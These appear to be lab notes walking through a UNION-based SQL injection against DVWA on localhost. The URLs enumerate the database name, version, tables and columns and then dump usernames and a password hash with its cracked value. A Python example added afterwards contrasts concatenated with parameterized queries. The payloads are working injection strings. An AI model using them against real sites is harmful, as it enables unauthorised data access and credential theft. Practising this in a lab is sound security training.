- Download DVWA - Damn Vulnerable Web Application
- (http://www.dvwa.co.uk/)
- Put that downloaded file in
- C:\xampp\htdocs\ {as dvwa}
- Now connect it to the database by opening the config/config.inc.php file
- textbox = $id
- Select id, fname, surname from table_name where id = '2' order by 1 --+ '
- - I put 2 as id and we got some result out of it.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#
- - To get an error, so that we can check whether the site is vulnerable or not, we pass a quote as well
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#
- Since we got an error, the site is vulnerable.
- - You have to find out the number of parameters already in the query.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' order by 1 --+ &Submit=Submit#
- What we got is that there are 2 parameters.
- - Now we have to inject our union into this query.
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 5,6 --+ &Submit=Submit#
- - now we can get the database name and version of my database
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select database(), version() --+ &Submit=Submit#
- so the database name is - dvwa
- and the version of my database is - 5.6.12
- as we got the database name, now we need to find out the table name:
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,table_name from information_schema.tables --+ &Submit=Submit#
- find the juicy table which could give you some passwords: users
- so we found the sensitive table name, and now need to proceed with the column names
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select 1,column_name from information_schema.columns where table_name = 'users' --+ &Submit=Submit#
- so we got user and password as the juicy columns in the users table
- Now we need to find the user and password from users table:
- http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' union select user, password from users --+ &Submit=Submit#
- so for id = 3
- first name : Hack
- Surname : Me
- username : 1337
- password : 8d3533d75ae2c3966d7e0d4fcc69216b ( charley )
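
The fix for the query shape these notes exploit, as an added example that is not part of the original paste or of DVWA's code: the same lookup built by string concatenation and with a bound parameter, fed the quote test and the final union input from the notes. SQLite stands in for MySQL so it runs offline; the table rows, the hash placeholder and the function names are constructed for illustration.

```python
import sqlite3

# Input taken from the last URL in the notes; "--+" there is "-- " once the "+" is URL-decoded.
UNION_INPUT = "2' union select user, password from users -- "
HASH = "<constructed-hash-placeholder>"

def make_db():
    # Constructed stand-in for DVWA's users table (assumed schema, SQLite instead of MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
               " last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (2, "Test", "User", "testuser", HASH),
        (3, "Hack", "Me", "1337", HASH),
    ])
    return db

def lookup_concatenated(db, user_id):
    # Weak form: the textbox value is pasted between quotes, so a quote in it ends the literal.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened form: the value is bound separately and is never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def raises_sql_error(lookup, db, user_id):
    # The quote test from the notes: does this input break the statement's syntax?
    try:
        lookup(db, user_id)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_concatenated),
                     ("parameterized", lookup_parameterized)):
        print(name, "quote error:", raises_sql_error(fn, db, "2'"))
        print(name, "union rows:", fn(db, UNION_INPUT))
```

With the bound parameter the quote no longer produces a syntax error and the union input matches no row, because the whole string is compared against user_id as a value.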